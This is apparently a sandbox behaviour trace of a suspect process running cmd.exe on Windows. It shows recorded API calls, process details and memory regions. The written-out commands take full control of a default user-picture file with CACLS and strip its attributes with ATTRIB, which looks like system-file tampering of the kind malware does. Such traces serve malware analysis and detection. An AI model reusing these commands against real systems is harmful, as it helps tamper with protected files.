[0183.185] FindClose (in: hFindFile=0xa0ae8 | out: hFindFile=0xa0ae8) returned 1 [0183.185] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f28c | out: lpFindFileData=0x30f28c) returned 0xa0ae8 [0183.185] FindClose (in: hFindFile=0xa0ae8 | out: hFindFile=0xa0ae8) returned 1 [0183.185] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f28c | out: lpFindFileData=0x30f28c) returned 0xa0ae8 [0183.185] FindClose (in: hFindFile=0xa0ae8 | out: hFindFile=0xa0ae8) returned 1 [0183.185] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.185] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0183.185] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0183.185] GetEnvironmentStringsW () returned 0xa0308* [0183.185] FreeEnvironmentStringsW (penv=0xa0308) returned 1 [0183.185] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.186] GetConsoleOutputCP () returned 0x1b5 [0183.186] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.186] GetUserDefaultLCID () returned 0x409 [0183.190] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f650, cchData=128 | out: lpLCData="0") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f650, cchData=128 | out: lpLCData="0") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f650, cchData=128 | out: lpLCData="1") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0183.191] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0183.192] GetConsoleTitleW (in: lpConsoleTitle=0x909b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.212] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.212] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0183.213] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0183.213] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0183.214] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0183.215] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0183.215] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0183.215] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 
[0183.215] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0183.215] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0183.215] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0183.215] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0183.263] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0183.264] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0183.264] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0183.264] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0183.264] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0183.264] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0183.264] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0183.266] GetConsoleTitleW (in: lpConsoleTitle=0x30f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.266] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.266] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.266] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.266] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.266] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.266] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.266] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.266] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.266] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.267] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.267] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.267] _wcsicmp 
(_String1="CACLS", _String2="MKDIR") returned -10 [0183.267] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.267] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.267] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.267] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.267] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.267] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.267] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.267] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.267] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.267] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.267] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.267] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.267] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.267] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.267] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.267] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.267] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.267] 
_wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.267] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.267] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.267] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.267] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.267] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.268] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.268] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.268] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.268] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.268] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.268] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.268] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.268] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.268] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.268] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.268] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.268] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.268] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.268] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.268] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.268] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.268] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.268] _wcsicmp (_String1="CACLS", _String2="START") returned -16 
[0183.268] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.268] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.268] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.268] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.268] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.268] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.268] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.268] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.268] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.268] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.268] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0183.268] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0183.268] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0183.268] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0183.269] SetErrorMode (uMode=0x0) returned 0x0 [0183.269] SetErrorMode (uMode=0x1) returned 0x0 [0183.269] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xa1e98, lpFilePart=0x30ee04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30ee04*="Desktop") returned 0x18 [0183.269] SetErrorMode (uMode=0x0) returned 0x1 [0183.269] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.269] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.274] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.275] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x30eb80) returned 0xffffffff [0183.275] GetLastError () returned 0x2 [0183.275] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.275] GetLastError () returned 0x2 [0183.275] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xa2180 [0183.276] FindClose (in: hFindFile=0xa2180 | out: hFindFile=0xa2180) returned 1 [0183.276] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.297] GetLastError () returned 0x2 [0183.297] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xa2180 [0183.297] FindClose (in: hFindFile=0xa2180 | out: hFindFile=0xa2180) returned 1 [0183.298] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.322] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.322] GetConsoleTitleW (in: lpConsoleTitle=0x30f078, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.322] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ef00, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30efc8 | out: lpAttributeList=0x30ef00, lpSize=0x30efc8) returned 1 [0183.322] UpdateProcThreadAttribute (in: lpAttributeList=0x30ef00, dwFlags=0x0, Attribute=0x60001, lpValue=0x30efc0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ef00, lpPreviousValue=0x0) returned 1 [0183.322] GetStartupInfoW (in: lpStartupInfo=0x30eebc | 
out: lpStartupInfo=0x30eebc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0183.322] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.323] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30ef5c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30efa8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x30efa8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xfe4, dwThreadId=0xfe0)) returned 1 [0183.326] CloseHandle (hObject=0x4c) returned 1 [0183.326] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.326] GetEnvironmentStringsW () returned 0xa0308* [0183.326] FreeEnvironmentStringsW (penv=0xa0308) returned 1 [0183.326] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0183.600] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30ee9c | out: lpExitCode=0x30ee9c*=0x0) returned 1 [0183.600] CloseHandle 
(hObject=0x50) returned 1 [0183.600] _vsnwprintf (in: _Buffer=0x30efe4, _BufferCount=0x13, _Format="%08X", _ArgList=0x30eea8 | out: _Buffer="00000000") returned 8 [0183.600] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.600] GetEnvironmentStringsW () returned 0xa2410* [0183.600] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.600] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.600] GetEnvironmentStringsW () returned 0xa2410* [0183.600] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.600] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ef00 | out: lpAttributeList=0x30ef00) [0183.600] GetConsoleTitleW (in: lpConsoleTitle=0x30f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.601] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.601] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.601] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.601] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.601] GetLastError () returned 0x2 [0183.601] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.601] GetLastError () returned 0x2 [0183.601] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0x9e4d8 [0183.602] FindClose (in: hFindFile=0x9e4d8 | out: hFindFile=0x9e4d8) returned 1 [0183.602] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.602] GetLastError () returned 0x2 [0183.602] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0x9e4d8 [0183.602] FindClose (in: hFindFile=0x9e4d8 | out: hFindFile=0x9e4d8) returned 1 [0183.602] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.602] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.602] GetConsoleTitleW (in: lpConsoleTitle=0x30f078, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.602] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ef00, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30efc8 | out: lpAttributeList=0x30ef00, lpSize=0x30efc8) returned 1 [0183.602] UpdateProcThreadAttribute (in: lpAttributeList=0x30ef00, dwFlags=0x0, Attribute=0x60001, lpValue=0x30efc0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ef00, lpPreviousValue=0x0) returned 1 [0183.602] GetStartupInfoW (in: lpStartupInfo=0x30eebc | out: lpStartupInfo=0x30eebc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0183.602] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.603] CreateProcessW (in: 
lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30ef5c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30efa8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", lpProcessInformation=0x30efa8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xfec, dwThreadId=0xf58)) returned 1 [0183.604] CloseHandle (hObject=0x50) returned 1 [0183.604] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.604] GetEnvironmentStringsW () returned 0xa2410* [0183.604] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.604] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0183.642] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30ee9c | out: lpExitCode=0x30ee9c*=0x0) returned 1 [0183.642] CloseHandle (hObject=0x4c) returned 1 [0183.642] _vsnwprintf (in: _Buffer=0x30efe4, _BufferCount=0x13, _Format="%08X", _ArgList=0x30eea8 | out: _Buffer="00000000") returned 8 [0183.642] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.642] GetEnvironmentStringsW () returned 0xa2410* [0183.642] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.642] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.642] GetEnvironmentStringsW () returned 
0xa2410* [0183.642] FreeEnvironmentStringsW (penv=0xa2410) returned 1 [0183.642] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ef00 | out: lpAttributeList=0x30ef00) [0183.642] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.642] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.642] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.642] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.643] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.643] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.643] SetConsoleInputExeNameW () returned 0x1 [0183.643] GetConsoleOutputCP () returned 0x1b5 [0183.643] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.643] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.643] exit (_Code=0) Process: id = "356" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xfe4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "355" os_parent_pid = "0xe58" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25961 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25962 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25963 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25964 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25965 start_va = 0x600000 end_va = 0x608fff entry_point = 0x600000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25966 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25967 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25968 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25969 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 25970 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25971 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25972 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25973 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" 
